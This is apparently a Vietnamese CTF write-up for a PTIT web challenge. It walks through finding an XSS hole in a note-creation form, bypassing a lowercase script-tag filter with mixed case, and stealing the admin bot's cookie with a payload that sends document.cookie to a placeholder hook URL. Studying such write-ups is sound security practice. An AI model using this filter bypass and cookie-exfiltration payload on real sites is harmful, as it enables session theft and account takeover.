PTIT
Pờ tít ver miền Bắc
Mở bài:
hế lô các bạn mình là K0n đây. Sau một chuỗi ngày tạch môn, lên voi xuống chóa thì tự dưng thấy pờ tít có giải cũng vui vui nên mình có tham gia thử. Rất cảm ơn các bạn đã tạo điều kiện cho mình được tham gia cùng.
Thân bài:
Chúng ta được cung cấp 2 link
+)link chall: http://167.172.80.186:1337/
+)link bot: http://167.172.80.186:7777/
Với kiểu này mình đoán sẽ liên quan đến lỗi xss, đây là một trong các lỗi cơ bản của mình học bảo mật.
Đầu tiên là form login, hãy tạo 1 tài khoản để chơi thôi
Mình đã có 1 tài khoản, chuyển hướng đến home mình thấy một creat note. Có lẽ đây là nơi có vuln.
Tạo một script đơn giản: <script>alert(1)</script>, tag script đã bị filter.
Có rất nhiều cách để bypass cái này nhưng mình sẽ chọn 1 cách đơn giản hơn.
Sửa payload thành <scRIpt>alert(1)</scRIpt>
Payload: <scRipt>var i = new Image;i.src="[link-hook]"+document.cookie</scRipt>
Đỉnh đỉnh đỉnh
Trả lờiXóa